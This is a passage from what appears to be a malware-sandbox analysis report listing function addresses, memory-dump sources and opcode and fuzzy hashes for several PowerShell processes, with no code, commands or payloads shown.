                                                                    • Snapshot File: hcaresult_0_2_7ffd34770000_NzEsfIiAc0.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 04a2f3c964b070f977a9fecb0a51e42cab1c24b4331b5a822d1ddf8d9d2510b4
                                                                    • Instruction ID: e975f4ad3f32b4c2029071781e06b51210e8a4c6805a7a807d09204f037a62c0
                                                                    • Opcode Fuzzy Hash: 04a2f3c964b070f977a9fecb0a51e42cab1c24b4331b5a822d1ddf8d9d2510b4
                                                                    • Instruction Fuzzy Hash: 2D514E5AA0D7D39AE712573D58B20F63FA0DF53229B5A50F3C2C4CE093DA4D690AD3A1

                                                                    Executed Functions

                                                                    Function 00007FFD347AA0D3 Relevance: .3, Instructions: 257COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244526939.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6635170f13f41f89d62c93cec21d4c93c1f0b789c35391162de4328867c3bfe4
                                                                    • Instruction ID: 99a15d5f11ce505ff65a73928c1ce5ca96a835d9e74c615ed8f055e970c7b99b
                                                                    • Opcode Fuzzy Hash: 6635170f13f41f89d62c93cec21d4c93c1f0b789c35391162de4328867c3bfe4
                                                                    • Instruction Fuzzy Hash: 80116D7690E7C89FDB938B389CA90947FB0EE6321070901EBC588CB1A3DA1D5C49D792
                                                                    Function 00007FFD34874073 Relevance: .2, Instructions: 183COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244978323.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9c0e427a098b2c480bb8e64c5c85d47af895d6568c9064676dee9fd4ef1f80a5
                                                                    • Instruction ID: f29261885bf2a8042b4c2caa1a8771dcf0e73722a94eb279d8719f2607be6233
                                                                    • Opcode Fuzzy Hash: 9c0e427a098b2c480bb8e64c5c85d47af895d6568c9064676dee9fd4ef1f80a5
                                                                    • Instruction Fuzzy Hash: 19511832B0DA964FE7D9EB1C48B11747BD2EF96660B5841BAC28DC7293DD28EC059341
                                                                    Function 00007FFD347A9758 Relevance: .1, Instructions: 130COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244526939.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 99bb3a2023b3b6e7799b9e964057e7aebbd7f1a50a4a31b7e7c3920fc706d453
                                                                    • Instruction ID: 848c85eb44e42f48b60dfdec40720a28e7e5ae840c1911f8f4642d1ec9eac59c
                                                                    • Opcode Fuzzy Hash: 99bb3a2023b3b6e7799b9e964057e7aebbd7f1a50a4a31b7e7c3920fc706d453
                                                                    • Instruction Fuzzy Hash: CB311771A1CB488FDB589F0C98466A9BBE0FBA9310F00412FE449C3252CA24F855CBC2
                                                                    Function 00007FFD3468E380 Relevance: .1, Instructions: 124COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244003260.00007FFD3468D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3468D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd3468d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8648456f21d7a80b8a193ee66483048ea646d98dd067603d510396e65d20f8d5
                                                                    • Instruction ID: 8c6a4374e11bcbb4b61c81dfa86f5b835a3732423835f1a00d483a339c9c547a
                                                                    • Opcode Fuzzy Hash: 8648456f21d7a80b8a193ee66483048ea646d98dd067603d510396e65d20f8d5
                                                                    • Instruction Fuzzy Hash: 7041F37190DBC45FE7968B28D8959923FB0EF53324B1505EFD08CCB1A3D629A84AC793
                                                                    Function 00007FFD347AA62C Relevance: .1, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244526939.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1af2cdd22f0e0839c76a41d5af5f7c3f8dff67215b77d7dc8928fa3a8aaa98ff
                                                                    • Instruction ID: 4d759bafd28dd953b13c3ad81f6a6d3a3b1e88b80a4e930eb3eb67e618e8d6eb
                                                                    • Opcode Fuzzy Hash: 1af2cdd22f0e0839c76a41d5af5f7c3f8dff67215b77d7dc8928fa3a8aaa98ff
                                                                    • Instruction Fuzzy Hash: 3721F87190CB4C8FEB59DFAC984A7E97FE0EB96321F04416BD048C3152DA74A41ACB92
                                                                    Function 00007FFD348740BF Relevance: .1, Instructions: 96COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244978323.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 51d818617c0e74ffd9bb42a9def156bf9a14ba9b9cc0943c138d5fcef02ce558
                                                                    • Instruction ID: 1e5bd758335f677c9b66642ad8b23a59372f7adf3a9632f0066e310293637eff
                                                                    • Opcode Fuzzy Hash: 51d818617c0e74ffd9bb42a9def156bf9a14ba9b9cc0943c138d5fcef02ce558
                                                                    • Instruction Fuzzy Hash: 6621C323B0DA974FE7E5EB1C48F11746AD2EF56650B5981BAD29DC71A3CE2CEC04A301
                                                                    Function 00007FFD3487681E Relevance: .1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244978323.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6e3657235895eb54140cfb06727246d45b2c9361054c1e071ac85f0ce71cb081
                                                                    • Instruction ID: 9de9ba2714f862cef0180405040ad55cc0cca7eb914a6ae271e48c163365806b
                                                                    • Opcode Fuzzy Hash: 6e3657235895eb54140cfb06727246d45b2c9361054c1e071ac85f0ce71cb081
                                                                    • Instruction Fuzzy Hash: EA11E332B0D6894FEB91DF9844B45A87BD1EF5A320F0440BFC54DEB193DA28A845E350
                                                                    Function 00007FFD348743CA Relevance: .1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244978323.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 862c9b69d063a66dfc1831f926b8d0c84d53fd0bbdbbe932889cce3d839b9279
                                                                    • Instruction ID: 9701f0050ad68a6c77f4177eb54b6e3c5ca6baa10cf27f5787e36c27ea31aac9
                                                                    • Opcode Fuzzy Hash: 862c9b69d063a66dfc1831f926b8d0c84d53fd0bbdbbe932889cce3d839b9279
                                                                    • Instruction Fuzzy Hash: D3112532B0E9894FE3A1E72C58B48B87BD1FF4262070800F6D29DD71A3DA29AC10A340
                                                                    Function 00007FFD347A33B5 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244526939.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                    • Instruction ID: 0a84c860f013be5360dc54d427524c8b7572197af3ada10ad28df495537e80d8
                                                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                    • Instruction Fuzzy Hash: 2501677121CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45

                                                                    Non-executed Functions

                                                                    Function 00007FFD347A8BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244526939.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K_^4$K_^7$K_^F$K_^J
                                                                    • API String ID: 0-377281160
                                                                    • Opcode ID: 34310539d2dbbe052e35c312abb072568bf97e18b880dfc370ce0cec5a804e58
                                                                    • Instruction ID: a9df2db955e23b3f35e66654de59260e4ad61196ecaeb889a9e2e5a958b0a231
                                                                    • Opcode Fuzzy Hash: 34310539d2dbbe052e35c312abb072568bf97e18b880dfc370ce0cec5a804e58
                                                                    • Instruction Fuzzy Hash: 292135F77089266FD7127BBCB8555EE3BA4CF9927834502B3D198DB013E914B09B8AC0

                                                                    Executed Functions

                                                                    Function 00007FFD34854073 Relevance: .2, Instructions: 181COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2352988616.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34850000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d47a560e978978338d7f7aa9a66fdf15d8153c6b7dcd78af81ba0e39c2585037
                                                                    • Instruction ID: 8acae8d7f53dd6f660037f9e96057c9115bc05551b5efbd8405431c143fdf7ff
                                                                    • Opcode Fuzzy Hash: d47a560e978978338d7f7aa9a66fdf15d8153c6b7dcd78af81ba0e39c2585037
                                                                    • Instruction Fuzzy Hash: 1F510632B4DA9A4FE7E9AB1D44A127477D2EF96620B5801FAC24EC7293DD18EC058341
                                                                    Function 00007FFD348540BF Relevance: .1, Instructions: 149COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2352988616.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34850000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d6ab652c3c205b3c561fe4d34939ff93c65236d02511b6aaf2a2e3868babce3e
                                                                    • Instruction ID: 760718e48f934564076e07d5fe343123f6f4f3bd414515768696aeaee4d4b558
                                                                    • Opcode Fuzzy Hash: d6ab652c3c205b3c561fe4d34939ff93c65236d02511b6aaf2a2e3868babce3e
                                                                    • Instruction Fuzzy Hash: 0D412833B4DA5A4FE7A5EB1D54A12B477D2EF56620B1800FBC24EC72A3DE18EC058341
                                                                    Function 00007FFD34789750 Relevance: .1, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2352010046.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 40352c9c0791c5e049dd8769154d5602188bfe2e6dafdf1e151426c6f3417a40
                                                                    • Instruction ID: b8c17ae04a02a67b7c8fe5ee9b6bdd39c1d3626130473a469ac1a1ad261c1e7b
                                                                    • Opcode Fuzzy Hash: 40352c9c0791c5e049dd8769154d5602188bfe2e6dafdf1e151426c6f3417a40
                                                                    • Instruction Fuzzy Hash: 6C413B7190CB888FDB59DF1C9C4A6A97FE0FB56311F04416FD449D3292CA64B855CBC2
                                                                    Function 00007FFD3466E540 Relevance: .1, Instructions: 124COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2350933798.00007FFD3466D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd3466d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 31e6859d77544d97fd8fa94a3478910c4a51b0453df49bf9677a31b434c39fd0
                                                                    • Instruction ID: 409b0a388cf0d148406e70f8eb446945f0cb76f41b2de9671e59cfc7c9b803b3
                                                                    • Opcode Fuzzy Hash: 31e6859d77544d97fd8fa94a3478910c4a51b0453df49bf9677a31b434c39fd0
                                                                    • Instruction Fuzzy Hash: 2641E33040DBC44FE7569B29D895A963FF0EF57220B1905DFD088CB1A3D62DAC46C792
                                                                    Function 00007FFD348543CA Relevance: .1, Instructions: 111COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2352988616.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34850000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e415edc1c4ea1c5534d5e8e39cd36dff2accb31b577b631d7dfef2b1a39b48bb
                                                                    • Instruction ID: 023364bac42fbead7936832e9e9d9fe3e253f409d46e2a3589d13c027b4e8c2f
                                                                    • Opcode Fuzzy Hash: e415edc1c4ea1c5534d5e8e39cd36dff2accb31b577b631d7dfef2b1a39b48bb
                                                                    • Instruction Fuzzy Hash: 0431F632B0DA494FE7A5E75DA4A1AF8B7E1EF45620B0800FBC65DC71A3DA19EC15C381
                                                                    Function 00007FFD3478A49C Relevance: .1, Instructions: 103COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2352010046.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: af365de3d1c14758ced41bfe318bd1140d118309dec4abcb764db9ca43c61229
                                                                    • Instruction ID: 77b4500fd7d6e86f974b1b0a6a3e5948314c4765f489e519be754227812197f1
                                                                    • Opcode Fuzzy Hash: af365de3d1c14758ced41bfe318bd1140d118309dec4abcb764db9ca43c61229
                                                                    • Instruction Fuzzy Hash: 3321287090C74C8FEB59DBAC984A7E97FE0EB96321F04416BD048C3152DA74A81ACB92
                                                                    Function 00007FFD3485681E Relevance: .1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2352988616.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34850000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e0c015fa09304a56affff892f56aa789f306f6cd280c4aa93552a8e8503c964c
                                                                    • Instruction ID: 6f82232fe581a0fc079faf2de7413de1ed71216aed173faae0198b090143e0d2
                                                                    • Opcode Fuzzy Hash: e0c015fa09304a56affff892f56aa789f306f6cd280c4aa93552a8e8503c964c
                                                                    • Instruction Fuzzy Hash: E711E332B0D6894FEB91DF9844E45A87BD1EF5A315F1840FFC64DEB193DA28A845D310
                                                                    Function 00007FFD347833B5 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2352010046.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                    • Instruction ID: e35d54fb46a0325d3c9533a66cc66369ca9705c70068c201e4045385024973ef
                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                    • Instruction Fuzzy Hash: D301677121CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45
                                                                    Function 00007FFD3478A0FB Relevance: .0, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2352010046.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d397633a3502b850662e81819f350c261013c16b5307b2d45868ebce0072a778
                                                                    • Instruction ID: 79fa219e8ae4ff3319e27152918a843b1aff2f9cd6462bc97453de2eee2ee92b
                                                                    • Opcode Fuzzy Hash: d397633a3502b850662e81819f350c261013c16b5307b2d45868ebce0072a778
                                                                    • Instruction Fuzzy Hash: 1DF0FC7AA09A8C4FDB81DF2C98661D5BFE0FF67211B0502ABD508C7151DA255848C7C1

                                                                    Non-executed Functions

                                                                    Function 00007FFD34788BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2352010046.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                    • API String ID: 0-962139525
                                                                    • Opcode ID: 32ba26589fa0e7a62dd8a312b3dc4cc8d233eb561294beb8cf2edc3a6d3793b8
                                                                    • Instruction ID: 6ee93f0a4304a5c5048fde7c0ab53bc99d3155f9f9a09ac8c2a541ffee2ce9ab
                                                                    • Opcode Fuzzy Hash: 32ba26589fa0e7a62dd8a312b3dc4cc8d233eb561294beb8cf2edc3a6d3793b8
                                                                    • Instruction Fuzzy Hash: 4021F9B37049169BD21136BCB8529ED7784DF5537938603F3E128DF153ED18649B8AC1

                                                                    Executed Functions

                                                                    Function 00007FFD34779EF3 Relevance: .3, Instructions: 253COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2504020529.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd34770000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 94fdfaf16e965f269e3a70f3a99d736d04b37f87fceced47e2e2bad52da896b9
                                                                    • Instruction ID: 73f78c38685ccc53b5ad06edf6e21f85b918cea1750b1cd84d309ccc4de0a4f9
                                                                    • Opcode Fuzzy Hash: 94fdfaf16e965f269e3a70f3a99d736d04b37f87fceced47e2e2bad52da896b9
                                                                    • Instruction Fuzzy Hash: B4711BA7B0DA968BF711676C9CB71FA7B90DF13338B4844B2C688CA053FD1D245696C2
                                                                    Function 00007FFD347796FA Relevance: .2, Instructions: 187COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2504020529.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd34770000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e2bfb75ae1d0ca8b38946aeb96d568ba056f1f20b49bd525cdf397bcddeb342d
                                                                    • Instruction ID: 7a827560137fb49eb6d77ac2a2db67e76a2fde488cf86aa1c34af69ec26c8bda
                                                                    • Opcode Fuzzy Hash: e2bfb75ae1d0ca8b38946aeb96d568ba056f1f20b49bd525cdf397bcddeb342d
                                                                    • Instruction Fuzzy Hash: EB5149B2A0DB859FEB189B185C561F8BFE0FF66310F44817FD449C3192DA68B8158BC2
                                                                    Function 00007FFD3465EF00 Relevance: .1, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2503051480.00007FFD3465D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3465D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd3465d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d599f8d17917301cf46258d4619e85c8cb03fb8a4d890482da1b50f7a222d8c5
                                                                    • Instruction ID: 558887eb0406fde6e87a3bdc5eb29042fdb5efdf306cc1f81315e6d764b35c7e
                                                                    • Opcode Fuzzy Hash: d599f8d17917301cf46258d4619e85c8cb03fb8a4d890482da1b50f7a222d8c5
                                                                    • Instruction Fuzzy Hash: 1641197180DBC44FE7568B29D8559923FF1EF57320B1901DFD088CB1A3DA29AC46C7A2
                                                                    Function 00007FFD3477A47C Relevance: .1, Instructions: 99COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2504020529.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd34770000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c7d097cd6abc4040b902d2f460c15fd025d3cdb6cf12f595e869c779dfdca1fc
                                                                    • Instruction ID: 455541d5ccc14ce7e5482a8a3c1ac647ea0bbf831af4ed28e621a58155839713
                                                                    • Opcode Fuzzy Hash: c7d097cd6abc4040b902d2f460c15fd025d3cdb6cf12f595e869c779dfdca1fc
                                                                    • Instruction Fuzzy Hash: B321067190CB4C8FEB59DBAC9C4A6E97FE0EB96321F04416BD048C3152DA75A416CB92
                                                                    Function 00007FFD3484681E Relevance: .1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2504842715.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd34840000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fc120fa896c26b7aa0e1e81f405f54f1f3a662688459dd55c238861bde43faf8
                                                                    • Instruction ID: 05a5f9c747fefc10e1660c34fd8e80ee1659bd8927824b29764c4762f1264cb1
                                                                    • Opcode Fuzzy Hash: fc120fa896c26b7aa0e1e81f405f54f1f3a662688459dd55c238861bde43faf8
                                                                    • Instruction Fuzzy Hash: F8110A32B0D6894FE791DF9840E4568BBD1EF5A320F0440BFC54DE7293D92C5845D310
                                                                    Function 00007FFD347733B5 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2504020529.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd34770000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                    • Instruction ID: 2cc47b0ba0fdde9b7c4ba52e5ec4494637230a7301f5fb9479e41aed1cd45b64
                                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                    • Instruction Fuzzy Hash: 6D01677121CB0C8FD754EF0CE451AB5B7E0FB95364F50056DE58AC3691DA36E882CB45
                                                                    Function 00007FFD3484414D Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2504842715.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd34840000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8b16e96691e6b9fd6b3c6e010f46d332a63262ccbacafdb2254b3d1dff21d6d5
                                                                    • Instruction ID: fafa7b70c5f5b17712e049d9948d614491e66278ae9aa370f0abdc36be851d6e
                                                                    • Opcode Fuzzy Hash: 8b16e96691e6b9fd6b3c6e010f46d332a63262ccbacafdb2254b3d1dff21d6d5
                                                                    • Instruction Fuzzy Hash: 78F05E32B0C9558FD7A9EB4CE4914E873E1EF5A36071500BAE25DC7663DA3AEC45C740
                                                                    Function 00007FFD34844400 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2504842715.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd34840000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ebf203ff7e46d37984dc3f014a37674e0a82800bbf86f493c519be4e455e16ee
                                                                    • Instruction ID: 15b2bfcbdbf5d784a94618a39bec91f5fccbc2fb93c30f22f997228f6207f3e3
                                                                    • Opcode Fuzzy Hash: ebf203ff7e46d37984dc3f014a37674e0a82800bbf86f493c519be4e455e16ee
                                                                    • Instruction Fuzzy Hash: 61F05E32B0D5448FDB94EB4CE4914A877E0FF4A72475500B7E25DC7663DA2AAC44C750
                                                                    Function 00007FFD348441D1 Relevance: .0, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2504842715.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd34840000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                    • Instruction ID: f7dbd9fce67771b93a9bbfec132734dfb62449b86e3f2ab7c658e19e21ab47df
                                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                    • Instruction Fuzzy Hash: B1E04F31B0C8188FDA68DB0CE0909E973E1EF9D33171101B7D24EC7661CA26EC51DB80

                                                                    Non-executed Functions

                                                                    Function 00007FFD34778BFA Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
